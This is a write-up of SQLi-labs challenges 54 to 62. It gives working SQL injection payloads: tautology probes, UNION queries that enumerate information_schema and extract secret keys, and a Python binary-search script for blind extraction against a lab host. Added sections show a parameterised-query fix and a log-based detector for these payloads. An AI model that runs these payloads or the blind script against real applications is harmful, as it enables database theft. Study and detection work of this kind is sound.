SQLi-labs Challenges
Less 54
Description: GET / challenge / Union / 10 queries allowed / Variation 1
The task is to retrieve secret_key from the challenges database; the number of queries is limited to 10.
#1. Determine the closing style -> single-quote closing
id=1' or '1'='1
#2. Get the table name -> PSYFDRBQFS
union select 1,group_concat(table_name),3 from information_schema.tables \
where table_schema='challenges'#
#3. Get the column names -> id,sessid,secret_HOGR,tryy
union select 1,group_concat(column_name),3 from information_schema.columns \
where table_name='PSYFDRBQFS'#
#4. Get the secret column -> YsqNLf4769SUGQm7HDdyNjRP
union select 1,group_concat(secret_HOGR),3 from PSYFDRBQFS#
Less 55
Description: GET / challenge / Union / 14 queries allowed / Variation 2
1. Determine the closing style
id=1' --+
id=1" --+
id=1 --+
id=1) --+ //correct
id=1') --+
id=1") --+
2. Regular queries
#1.table_name -> A8OVY3542N
-1) union select 1,group_concat(table_name),3 from information_schema.tables \
where table_schema='challenges'--+
#2.column_name -> secret_XXQ0
-1) union select 1,group_concat(column_name),3 from information_schema.columns \
where table_name='A8OVY3542N'--+
# secret_key -> tDKqoseQXitElBSv7SsW3XLv
-1) union select 1,group_concat(secret_XXQ0),3 from A8OVY3542N--+
Less 56-61 differ basically only in the closing style; the common closing styles are ', ", ), '), ") and '')) and so on.
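Every level above comes down to the same defect: the id value is spliced into the SQL text, so whichever quote or bracket closes the literal decides which probe "works". The following added example (my code, not part of this write-up or of SQLi-labs) reproduces that with an in-memory SQLite table standing in for the challenges database, runs the closing-style, tautology and UNION probes from the write-up against three hypothetical server-side query templates, and puts the parameterised query beside them. The table, rows and templates are constructed assumptions; because SQLite does not treat # as a comment the way MySQL does, the payloads here end in -- instead.

```python
import sqlite3

# Constructed stand-in for the lab's "challenges" database (assumption, not the real schema).
ROWS = [(1, "Angelina", "secret-1"), (2, "Dumb", "secret-2"), (3, "Dummy", "secret-3")]

# Hypothetical server-side query templates, one per closing style from the write-up.
# The user-controlled value is spliced into the {} slot, which is the defect the lab models.
TEMPLATES = {
    "'":  "SELECT username FROM users WHERE id='{}'",
    ")":  "SELECT username FROM users WHERE id=({})",
    "')": "SELECT username FROM users WHERE id=('{}')",
}


def make_db():
    """Build the in-memory sample database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn, style, user_id):
    """String-concatenated query. Returns the matched usernames, or None when the
    spliced value breaks the SQL syntax (the error / no-error difference that the
    closing-style probes in the write-up rely on)."""
    sql = TEMPLATES[style].format(user_id)
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def lookup_safe(conn, user_id):
    """Parameterised query: the driver passes the value out of band, so quotes and
    brackets in it can never close the literal, whatever style the template uses."""
    cur = conn.execute("SELECT username FROM users WHERE id=?", (user_id,))
    return [row[0] for row in cur]


def compare(conn, style, user_id):
    """Run one input through both code paths for a side-by-side view."""
    return {"vulnerable": lookup_vulnerable(conn, style, user_id),
            "safe": lookup_safe(conn, user_id)}


if __name__ == "__main__":
    db = make_db()
    # Closing-style probes: only the probe that matches the template returns a row
    # without a syntax error; the parameterised path returns nothing for all of them.
    for style in TEMPLATES:
        for probe in ("1' --", "1) --", "1') --"):
            print(f"style {style!r:5} probe {probe!r:10} -> {compare(db, style, probe)}")
    # Tautology and UNION payloads against the single-quote style
    print(compare(db, "'", "1' or '1'='1"))
    print(compare(db, "'", "-1' union select secret from users--"))
```

The three templates make the probing logic from Less 55 visible: a mismatched probe either produces a syntax error (None) or a harmless string literal that matches nothing, while the matching probe returns the expected row. The parameterised lookup returns the same result for every probe, which is the whole fix.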
Less 62
Description: GET / challenge / Blind / 130 queries allowed / variation 1
Probing shows the closing style is '), and the query limit is 130, so this is blind injection; binary search is used here. (130 queries isn't enough, I'm outta here~
# -*- coding: utf-8 -*-
import requests
from urllib.parse import quote_plus

main_url = 'http://43.247.91.228:84/Less-62/?id='
correct = 'Your Login name : Angelina'   # marker shown when the injected condition is true

# payload: ') closing, then compare the ASCII code of the i-th character of the result
table_name_ = ('1\') and ascii(substr((select group_concat(table_name) '
               'from information_schema.tables where table_schema=\'challenges\'),%d,1))%s%d#')


def check(query_string):
    """Return True when the page shows the 'correct' marker for this query."""
    url = main_url + quote_plus(query_string)
    html = requests.get(url)
    return correct in html.text


def search(payload):
    print('[*]' + payload)
    result = ''
    print('[~]', end='')
    for i in range(1, 100):
        left = 33
        right = 127
        found = False
        # binary search over printable ASCII for character i
        while left <= right:
            mid = (left + right) // 2
            if check(payload % (i, '=', mid)):
                result += chr(mid)
                print(chr(mid), end='')
                found = True
                break
            if check(payload % (i, '>', mid)):
                left = mid + 1
            else:
                right = mid - 1
        if not found:
            # past the end of the string: substr() returns '' and no code matches,
            # so stop instead of spending queries on the remaining positions
            break
    print()
    return result


if __name__ == "__main__":
    table_name = search(table_name_)
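From the defender's side, the binary-search script above leaves a very recognisable trail: dozens of requests from one client whose id parameter differs only in the comparison value inside ascii(substr(...)). The added example below (my code, not from the write-up) parses constructed access-log lines in the common log format, URL-decodes the query parameters, tags each request with the technique it matches (UNION, information_schema enumeration, tautology, boolean-blind comparison), and reports any client that sends a burst of blind probes. The log lines, IP addresses and burst threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, quote_plus, urlsplit

# Common log format: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Signatures for the techniques seen in the write-up, applied to the decoded query values.
SIGNATURES = {
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum":   re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "tautology":     re.compile(r"\bor\s+'?(\w+)'?\s*=\s*'?\1\b", re.I),   # or '1'='1, or 1=1
    "boolean_blind": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
}


def decode_target(target):
    """URL-decode every query parameter value so percent-encoded payloads are visible."""
    query = urlsplit(target).query
    values = []
    for vs in parse_qs(query, keep_blank_values=True).values():
        values.extend(vs)
    return " ".join(values)


def classify(line):
    """Parse one log line and return its client IP, decoded parameters and signature hits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return {"ip": m.group("ip"), "target": m.group("target"), "decoded": decoded, "hits": hits}


def analyse(lines, blind_threshold=5):
    """Return (per-line findings, per-IP blind-probe bursts). A burst is the binary-search
    pattern: one client repeating ascii(substr(...)) comparisons at or above the threshold."""
    findings = []
    blind_per_ip = Counter()
    for line in lines:
        c = classify(line)
        if c is None:
            continue
        if c["hits"]:
            findings.append(c)
        if "boolean_blind" in c["hits"]:
            blind_per_ip[c["ip"]] += 1
    bursts = {ip: n for ip, n in blind_per_ip.items() if n >= blind_threshold}
    return findings, bursts


def _line(ip, payload):
    """Build a constructed log line with the payload encoded the way the script above sends it."""
    return (f'{ip} - - [10/Oct/2023:13:55:36 +0000] '
            f'"GET /Less-62/?id={quote_plus(payload)} HTTP/1.1" 200 1043')


# Constructed sample log: two benign requests, then one client probing as in the write-up.
SAMPLE_LOG = [
    _line("198.51.100.7", "1"),
    _line("198.51.100.7", "2"),
    _line("203.0.113.10", "1' or '1'='1"),
    _line("203.0.113.10", "-1) union select 1,group_concat(table_name),3 "
                          "from information_schema.tables where table_schema='challenges'--"),
] + [
    _line("203.0.113.10", "1') and ascii(substr((select group_concat(table_name) "
                          f"from information_schema.tables where table_schema='challenges'),1,1))>{n}#")
    for n in (80, 104, 92, 86, 83, 84)
]


if __name__ == "__main__":
    findings, bursts = analyse(SAMPLE_LOG)
    for f in findings:
        print(f["ip"], f["hits"], f["decoded"][:60])
    print("blind-probe bursts:", bursts)
```

The per-request signatures catch the UNION and tautology steps on their own; the boolean-blind step is only convincing in aggregate, which is why the counter keys on the client address and the threshold is a tunable parameter rather than a single-request match.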
The remaining levels differ mainly in the closing style, so I won't go into them. Having worked through all of SQLi-labs, it felt less difficult than I expected: many levels are just small variations on the same type (such as the closing style). They are all basic exercises, well suited for beginners getting started~